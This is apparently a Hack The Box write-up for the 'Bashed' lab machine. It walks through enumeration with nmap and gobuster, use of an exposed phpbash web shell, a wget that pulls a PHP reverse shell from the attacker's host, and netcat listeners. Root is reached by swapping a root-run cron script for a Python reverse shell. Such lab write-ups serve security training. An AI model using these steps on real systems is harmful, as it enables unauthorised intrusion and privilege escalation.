In my first article, I'll explain in details of the process of how to gain root access to the "Bashed" machine.
Based on scores of HacktheBox users, we can say that this machine is on the easier side of difficulty level.
diffuculty

As always, at first, we are checking Nmap scanning results:

[email protected]:~# nmap -A -sV 10.10.10.68
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 07:43 GMT
Nmap scan report for 10.10.10.68
Host is up (0.14s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Nmap done: 1 IP address (1 host up) scanned in 29.56 seconds

After fast 1000 port scanning, I started a full port scan of the max (1-65535), so we can recheck to ensure that there aren’t running any service in any ports. By the way, this machine runs web service on port 80 so we can check directories with DirBuster (comes with GUI), GoBuster or dirb. Here, I used gobuster.

websitesi

When we visit the website, we can access variously related explanations with the development of phpbash. You can access to phpbash. script as well as GitHub link of Arrexel that created for this machine. If you review the code on GitHub, you understand this single phpbash file is a standalone, semi-interactive web shell. Also, this is a fantastic field for an attack. Now, let’s see what we got with GoBuster.

gobuster -u 10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

On gobuster command:

  • -x can identify file extension,
  • -w can identify the dictionary you want to use.

Depending on GoBuster results, some files and scripts directory can be seen under it such as "/uploads", "/php" , "/dev" folders. In the root directory,we see an index page, and we cannot list files. When we are in “dev” directory, we can list the phpbash.php, and that's what we look for.
phpbash

First, let’s learn the user and group IDs by running id command. Then, we will check if we have access permission to /home directory to get the user.txt flag.

[email protected]:/var/www/html/dev# id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/var/www/html/dev# cd /home
[email protected]:/home# ls
arrexel
scriptmanager
[email protected]:/home# cd arrexel
[email protected]:/home/arrexel# ls -la
total 36
drwxr-xr-x 4 arrexel arrexel 4096 Dec 4 2017 .
drwxr-xr-x 4 root root 4096 Dec 4 2017 ..
-rw------- 1 arrexel arrexel 1 Dec 23 2017 .bash_history
-rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3786 Dec 4 2017 .bashrc
drwx------ 2 arrexel arrexel 4096 Dec 4 2017 .cache
drwxrwxr-x 2 arrexel arrexel 4096 Dec 4 2017 .nano
-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile
-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel 33 Dec 4 2017 user.txt

[email protected]:/home/arrexel# cat user.txt
JACKPOT. You have found user.txt :)

Before the Privilege Escalation part, let’s try to open a reverse shell besides the web shell. In the following sections, I will explain why it is better to have a reverse shell. First, you can download PHP Tiny Reverse Shell, I have shared on my GitHub.
Don't forget to edit 10.10.10.10 IP and 1234 port in the reverseshell.php file.

While on web shell, www-data has the authorisation to write into /var/www/html/uploads directory. Here, you can write the reverseshell.php file and then, we can call the reverseshell.php file on our browser.
Let’s use our favourite Python module we use almost all the time to send files: SimpleHTTPServer

[email protected]:~/Desktop/bashed# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Navigate to http://10.10.10.68/dev/phpbash.php

[email protected]:/var/www/html/uploads# wget http://10.10.X.21/reverseshell.php

--2019-02-19 00:27:25-- http://10.10.X.21/reverseshell.php
Connecting to 10.10.X.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 72 [application/octet-stream]
Saving to: 'reverseshell.php'

0K 100% 14.0M=0s

2019-02-19 00:27:25 (14.0 MB/s) - 'reverseshell.php' saved [72/72]

Let’s set netcat listener in our local as given below.

[email protected]:~/Desktop/bashed# nc -nvlp 1234
listening on [any] 1234 ...

so when you check your nc listener:

[email protected]:~/Desktop/bashed# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.X.21] from (UNKNOWN) [10.10.10.68] 37420
bash: cannot set terminal process group (743): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/var/www/html/uploads$ 

To work on the shell more easily type:

$ python -c "import pty; pty.spawn('/bin/bash');"

When we get around the root directory, again some files and script directory can be seen under it. One says "Enumerate More..."

[email protected]:/$ ls -la
ls -la
total 88
drwxr-xr-x  23 root          root           4096 Dec  4  2017 .
drwxr-xr-x  23 root          root           4096 Dec  4  2017 ..
drwxr-xr-x   2 root          root           4096 Dec  4  2017 bin
drwxr-xr-x   3 root          root           4096 Dec  4  2017 boot
drwxr-xr-x  19 root          root           4240 Feb 17 22:14 dev
drwxr-xr-x  89 root          root           4096 Dec  4  2017 etc
drwxr-xr-x   4 root          root           4096 Dec  4  2017 home
lrwxrwxrwx   1 root          root             32 Dec  4  2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x  19 root          root           4096 Dec  4  2017 lib
drwxr-xr-x   2 root          root           4096 Dec  4  2017 lib64
drwx------   2 root          root          16384 Dec  4  2017 lost+found
drwxr-xr-x   4 root          root           4096 Dec  4  2017 media
drwxr-xr-x   2 root          root           4096 Feb 15  2017 mnt
drwxr-xr-x   2 root          root           4096 Dec  4  2017 opt
dr-xr-xr-x 121 root          root              0 Feb 17 22:14 proc
drwx------   3 root          root           4096 Dec  4  2017 root
drwxr-xr-x  18 root          root            520 Feb 18 06:25 run
drwxr-xr-x   2 root          root           4096 Dec  4  2017 sbin
drwxrwxr--   2 scriptmanager scriptmanager  4096 Dec  4  2017 scripts
drwxr-xr-x   2 root          root           4096 Feb 15  2017 srv
dr-xr-xr-x  13 root          root              0 Feb 17 22:14 sys
drwxrwxrwt  10 root          root           4096 Feb 19 00:48 tmp
drwxr-xr-x  10 root          root           4096 Dec  4  2017 usr
drwxr-xr-x  12 root          root           4096 Dec  4  2017 var
lrwxrwxrwx   1 root          root             29 Dec  4  2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
[email protected]:/$ cd scrpits
cd scrpits
bash: cd: scrpits: No such file or directory
[email protected]:/$ cd scripts
cd scripts
bash: cd: scripts: Permission denied
[email protected]:/$ ls -la scripts
ls -la scripts
ls: cannot access 'scripts/..': Permission denied
ls: cannot access 'scripts/test.py': Permission denied
ls: cannot access 'scripts/test.txt': Permission denied
ls: cannot access 'scripts/.': Permission denied
total 0
d????????? ? ? ? ?            ? .
d????????? ? ? ? ?            ? ..
-????????? ? ? ? ?            ? test.py
-????????? ? ? ? ?            ? test.txt

Well Well Well, we have an interesting directory here: "/scripts" directory and scriptmanager as the owner. Since we have read-only authorisation with the www-data user, at least we can list files in the directory.
Let's type:

sudo -l

 [email protected]:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

We can see that www-data user can run any commands as scriptmanager.

[email protected]:/$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
[email protected]:/$ 

Let’s get back to "/scripts" directory.

[email protected]:/scripts$ ls -la
ls -la
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Feb 19 01:58 test.txt
[email protected]:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
[email protected]:/scripts$ cat test.txt
cat test.txt
testing [email protected]:/scripts$ 

As it can be seen, when we run test.py, content of test.txt files are printed as they are in script. The important thing is that test.txt file is controlled by root, but the owner of test.py is scriptmanager. In other words, the test.txt file changes every minute. This way, it is highly possible that a cron job-style structure triggers this file and owned by root. You can access to the root.txt flag by editing test.py script or get a reverse shell with netcat.
You can use Python reverse shell from pentestmonkey. Let’s edit test.py file and change IP and PORT to your own. Link.

Set up your netcat listener:

[email protected]:~# nc -lnvp 1453
listening on [any] 1453 ...
connect to [10.10.x.21] from (UNKNOWN) [10.10.10.68] 50176
/bin/sh: 0: can’t access tty; job control turned off
# whoami
root